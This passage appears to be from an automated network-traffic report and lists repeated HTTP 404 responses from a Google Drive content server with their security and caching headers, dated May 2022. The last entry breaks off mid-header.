                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:31 GMTStrict-Transport-Security: max-age=31536000Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-zjda+b4+N7VTlSCb9cRb1g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:32 GMTStrict-Transport-Security: max-age=31536000Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionReport-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-mYWaxGH0y9wpAv4K6f4YyA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:32 GMTStrict-Transport-Security: max-age=31536000Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-QhPsW0OLoT0Be3R24rQQpg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:32 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-CquuWTGYRmBtGWpxWmX7fg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:32 GMTStrict-Transport-Security: max-age=31536000Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-+ji4LieRLJP/nC07pk5yYw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:32 GMTStrict-Transport-Security: max-age=31536000Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-fzMWW6/cevAE86pmft1aHA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:32 GMTStrict-Transport-Security: max-age=31536000Cross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-yYYadACdjx+K1AyZdc9Dow' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:32 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: script-src 'report-sample' 'nonce-BZeZiQGiMZh+Zol2aI+wPg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:33 GMTStrict-Transport-Security: max-age=31536000Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-z3czQcOeeLROFUbMzDMNjg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:33 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-MgQmBy0crSl58seEyUMxGQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:33 GMTStrict-Transport-Security: max-age=31536000Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-2kuVWl9Pr3If4/qD+rl5GA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:33 GMTStrict-Transport-Security: max-age=31536000Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-llTuGy2C8qmU+1iDomtrKA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:33 GMTStrict-Transport-Security: max-age=31536000Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-51QqysDPh/PhygcPA6/S8Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:33 GMTStrict-Transport-Security: max-age=31536000Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionReport-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-/+GbJQH5LxI6sJDI4koQ/w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:33 GMTStrict-Transport-Security: max-age=31536000Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-w2V4LS8zE6emGsfYDbDhxg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:33 GMTStrict-Transport-Security: max-age=31536000Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-Cyl1qu7cmTXwT6K4SpenNA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:34 GMTStrict-Transport-Security: max-age=31536000Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-DWMVWok7zBaOQXOWKmUfJA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:34 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-BepeyaCpmyJh7/sZeFoR7g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:34 GMTStrict-Transport-Security: max-age=31536000Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionReport-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-P0tZ9R+KXbui8YiWpXTbmw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:34 GMTStrict-Transport-Security: max-age=31536000Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-8NfiRnzK+yv9bBH/nb7cgg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionReport-To: 